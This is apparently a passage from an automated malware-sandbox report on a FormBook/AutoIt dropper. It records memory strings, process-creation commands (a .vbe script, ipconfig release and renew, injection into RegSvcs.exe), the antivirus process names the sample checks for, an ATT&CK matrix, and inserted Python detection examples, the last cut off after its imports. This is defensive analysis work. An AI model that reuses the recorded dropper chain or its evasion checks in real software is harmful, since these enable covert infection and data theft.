                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z70309smemstr_dc8f4b17-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uvd80uip0umqfs83s562p94302amemstr_c6eac745-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k65vkttwty2uofb2iz186wuenm50x2h44fjm5memstr_28ec96c5-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qd3j53gy22t07zj577p31l7482czap6i8s94a4x2787z35memstr_e4226c74-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i91t4g6cjtyw5toh0f23918mv72857g4e277n784fmemstr_554f1ca9-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }zb\nmemstr_2edd468d-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3o#r!memstr_f58c5250-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wtk<[jmemstr_987ecf13-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k60ovtey1nlw95nox3f07t098bmemstr_f409e102-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3767c8p692940jmxd0uu27agzc53897832u2snk1qm0hmemstr_2e03969d-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s867s5omemstr_0411fd9c-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vk20008921ard61sl8je9ds8m3389g9srh5lu69pmemstr_afa67cda-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 19kj6i20uoh886fm6m4w86i7967284323qb7s5k25okz4s52memstr_396a4a49-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .*fjybmemstr_3853d28f-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x8l6k1it7o550031rs1rb9fa3v4l30uth3myti43memstr_bbb44b63-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2lu966w6cr0749j4jmq4417001821memstr_334f38e8-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l~?=lmemstr_b857384a-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !hpbzmemstr_dcd0f5a4-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1sggcdji07k3262j7ydq9r87f42v3m704memstr_88dac227-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: us6499jj7zk0ljfrg1k8p67v08reb6bz3t22p9ddb672memstr_7f696435-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oi\v|memstr_68135a79-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 41dj22lwl65r749564immemstr_6b29cffa-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sq2i6923dvdkg405q4lke40uqe3amemstr_9f65f4d4-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >-ipmemstr_933cbd41-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w824u31eeehyxkhuud929jk23r3g07q24h10v795ildc2l58fmemstr_e2e803b4-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j5j8q8dy62271gcpn40c92be074hkvvpye161x7gmemstr_d28fa4cf-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gj2qar3env0jpe6m2o44xe6tl234edt8904m47memstr_f13e8777-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 06pw5ch6r91uw8364memstr_a7f32914-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 03e363u9z6h0memstr_ccae471f-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l410s9ea3w40533o44496a45984x3g2ii085h9cd7n7v54c2memstr_f7ce604c-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crxir9wsy71wcrrp6o554p34sf2memstr_0f39aaa7-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5514s9qs4oa2g779dzb34x53pl9b04olutt4qdxp10sdc1zjmemstr_25a296ee-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rbw35a5g3mauhd22k67le28a4mt5noi0z4h2049vv5bmemstr_8d969c10-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i :w$memstr_a5183af9-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gjd[cgimemstr_4764d5ec-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9ub1ettr1hqy5ub1sbxflbdlv8080lp499s9o6599u2qh5jmemstr_a0a634ad-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tw82r9wh91c9ht6nmemstr_1fcbbcad-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kw7kjc4eamemstr_f821df28-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0iyikjpr1memstr_40551c3a-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f5520912qt578c7z91memstr_a3b75340-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .fr{fq~memstr_35aa6b5c-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inkx7memstr_3a3f05cc-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sv>m=ocmemstr_f1cedf15-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l65e2a36m08prq7ja8b3my2005memstr_74d4ee49-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %/0cmemstr_e40633a4-6
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBBB02 SendInput,keybd_event, 10_2_00CBBB02
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBEBE5 mouse_event, 10_2_00CBEBE5
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc tguujh.msc nhhjmppg.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CB13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 10_2_00CB13F2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CB1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 10_2_00CB1EF3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073AA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp, tguujh.msc, 0000000A.00000003.1474059537.0000000001411000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: tguujh.msc, tguujh.msc.exe | Binary or memory string: Shell_TrayWnd
                Source: tguujh.msc, 0000000A.00000003.1594936092.0000000001323000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1595121984.0000000001323000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: tguujh.msc.exe, 00000010.00000002.1734842399.0000000001670000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "
                Source: nhhjmppg.dll.0.dr, nhhjmppg.dll.10.dr | Binary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593096189.000000000136B000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593197392.0000000001372000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager{
                Source: tguujh.msc.exe, 00000010.00000003.1732066040.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731814369.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager\

                Language, Device and Operating System Detection

                Source: Yara match | File source: Process Memory Space: tguujh.msc PID: 2056, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: tguujh.msc.exe PID: 5748, type: MEMORYSTR
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_009B6694 cpuid 0_2_009B6694
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_009AFD34
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_009B454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_009B454A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CAE5F8 GetUserNameW, 10_2_00CAE5F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00C8BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 10_2_00C8BCF2
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_009A03BE GetVersionExW, 0_2_009A03BE
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: tguujh.msc.exe, 00000010.00000003.1732225603.0000000001774000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000002.1735469081.0000000001775000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdagent.exe
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593247910.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596235006.00000000013F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: regshot.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: tguujh.msc.exe | Binary or memory string: WIN_81
                Source: tguujh.msc.exe | Binary or memory string: WIN_XP
                Source: tguujh.msc.exe.exe.16.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: tguujh.msc.exe | Binary or memory string: WIN_XPe
                Source: tguujh.msc.exe | Binary or memory string: WIN_VISTA
                Source: tguujh.msc.exe | Binary or memory string: WIN_7
                Source: tguujh.msc.exe | Binary or memory string: WIN_8
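The two string findings in this report, the AV/analysis-tool process names pulled from tguujh.msc memory (bdagent.exe, avp.exe, regshot.exe) and the AutoIt runtime strings present in every stage (the www.autoitscript.com/autoit3 URL and the WIN_XP..WIN_11 version table), are cheap to reproduce offline with a string scan. The following is an added example, not code from Joe Sandbox or from the sample; it runs on a constructed byte blob, and the AU3! magic of AutoIt compiled-script resources is this example's own addition rather than something the report lists.

```python
"""String triage for an AutoIt-compiled dropper stage.

Added example; not code from the Joe Sandbox report or from the analysed
sample. It reproduces two of the report's string findings on a constructed
byte blob: the AV/analysis-tool process names the report pulled from
tguujh.msc memory (bdagent.exe, avp.exe, regshot.exe) and the AutoIt runtime
strings it found in every stage (the www.autoitscript.com/autoit3 URL and the
WIN_XP..WIN_11 version table). The AU3! magic of AutoIt compiled-script
resources is this example's own addition (assumption), not a report finding.
"""
import hashlib
import re
from typing import Dict, List

# Process names the report found in tguujh.msc memory (signature "AV process
# strings found"); the stage compares running processes against such a list.
ANALYSIS_TOOL_NAMES = {"bdagent.exe", "avp.exe", "regshot.exe"}

# Runtime strings the report found in all stages, plus the AU3! magic (assumed).
AUTOIT_MARKERS = ("www.autoitscript.com/autoit3", "WIN_XPeWIN_XP", "AU3!")

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(blob: bytes) -> List[str]:
    """ASCII and UTF-16LE printable runs of 4+ characters, in file order
    (what `strings -a` and `strings -el` would print)."""
    found = [(m.start(), m.group().decode("ascii")) for m in ASCII_RUN.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in UTF16_RUN.finditer(blob)]
    return [s for _, s in sorted(found)]


def triage_strings(blob: bytes) -> Dict[str, object]:
    strings = extract_strings(blob)
    lowered = [s.lower() for s in strings]
    tools = sorted(n for n in ANALYSIS_TOOL_NAMES if any(n in s for s in lowered))
    markers = [m for m in AUTOIT_MARKERS if any(m in s for s in strings)]
    return {
        "sha256": hashlib.sha256(blob).hexdigest(),   # pivot key for the context tables
        "string_count": len(strings),
        "analysis_tool_names": tools,
        "autoit_markers": markers,
        # AutoIt runtime strings together with an AV/analysis-tool name list is
        # the shape of the injector stage; either alone is not enough to call it.
        "likely_autoit_injector": bool(markers) and len(tools) >= 2,
    }


# Constructed blob: junk bytes around the strings the report observed, some
# stored as UTF-16LE the way AutoIt keeps its tables.
SAMPLE_BLOB = (
    b"\x00\x01MZ\x90\x00filler\xff\xfe"
    + "bdagent.exe".encode("utf-16-le") + b"\x00\x00"
    + b"\x13\x37avp.exe\x00regshot.exe\x00"
    + b"http://www.autoitscript.com/autoit3/J\x00"
    + "X86IA64X64WIN32_NTWIN_11WIN_10WIN_XPeWIN_XP".encode("utf-16-le")
    + b"\x00AU3!EA06\x00\x00"
)

if __name__ == "__main__":
    for key, value in triage_strings(SAMPLE_BLOB).items():
        print(f"{key}: {value}")
```

The verdict deliberately requires both signals: the AutoIt runtime strings alone match every legitimately compiled AutoIt tool, and a list of AV process names alone matches plenty of installers and support utilities.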

                Remote Access Functionality

                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function 10_2_00CD2163: socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function 10_2_00CD1B61: socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function 16_2_00C42163: socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | Code function 16_2_00C41B61: socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
                MITRE ATT&CK matrix (digits before a technique name are the report's counters for that technique; cells without digits are the matrix's default placeholders and were not observed)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 1 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | Steganography | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | 11 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 Software Packing | NTDS | 27 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 312 Process Injection | 1 DLL Side-Loading | LSA Secrets | 261 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Registry Run Keys / Startup Folder | 1 Masquerading | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 312 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph ID: 1569428 | Sample: uhbrQkYNzx.exe | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 100
                Sample-level signatures: Multi AV Scanner detection for submitted file; Yara detected Autoit Injector; Yara detected FormBook; 8 other signatures

                Process tree recovered from the graph (bracketed numbers are the graph's per-process counters, which its legend labels "Number of created Registry Values" and "Number of created Files"; dropped files are PE32; signatures are listed under the process they fired on):

                uhbrQkYNzx.exe [3 30]
                    dropped: C:\Users\user\AppData\Local\...\tguujh.msc
                    signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    wscript.exe [1]
                        signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        cmd.exe [1]
                            tguujh.msc [1 27]
                                dropped: C:\Users\user\AppData\...\tguujh.msc.exe
                                dropped: C:\Users\user\AppData\Local\...\tguujh.msc
                                dropped: C:\Users\user\AppData\...\tguujh.msc.exe
                                signature: Found API chain indicative of sandbox detection
                                signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                signature: Writes to foreign memory regions
                                signature: 2 other signatures
                                RegSvcs.exe
                                RegSvcs.exe
                            conhost.exe
                        cmd.exe [1]
                            signature: Uses ipconfig to lookup or modify the Windows network settings
                            conhost.exe
                            ipconfig.exe [1]
                        cmd.exe [1]
                            conhost.exe
                            ipconfig.exe [1]
                tguujh.msc.exe [1 1] (second root of the graph, launched from the start node rather than by uhbrQkYNzx.exe)
                    dropped: C:\Users\user\AppData\...\tguujh.msc.exe.exe
                    signature: Creates autostart registry keys with suspicious values (likely registry only malware)
                    signature: Found API chain indicative of sandbox detection
                    signature: Writes to foreign memory regions
                    RegSvcs.exe
                        WerFault.exe [4]
                    RegSvcs.exe
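The lineage in the behavior graph (sample on the Desktop spawning wscript.exe, cmd.exe executing a file with a .msc extension out of Temp, and RegSvcs.exe, a .NET framework utility, started by that Temp-resident stage as the FormBook hollowing target) is what the report's Sigma hits "WScript or CScript Dropper" and "Script Interpreter Execution From Suspicious Folder" key on. The following added example, which is not Joe Sandbox code, rebuilds such a tree from process-creation events and applies three lineage rules. The event list is constructed to mirror the graph; the pids, the RegSvcs.exe path, the script name stage.vbs and the cmd.exe command lines are assumptions, since the report shows the processes but not their command lines.

```python
"""Process-lineage detections for the behaviour graph above.

Added example, not Joe Sandbox code. The events below are constructed to
mirror the report's process tree; pids, the wscript.exe script path
(stage.vbs), the RegSvcs.exe path and the cmd.exe command lines are
assumptions, since the report shows the processes but not their command lines.
"""
import ntpath
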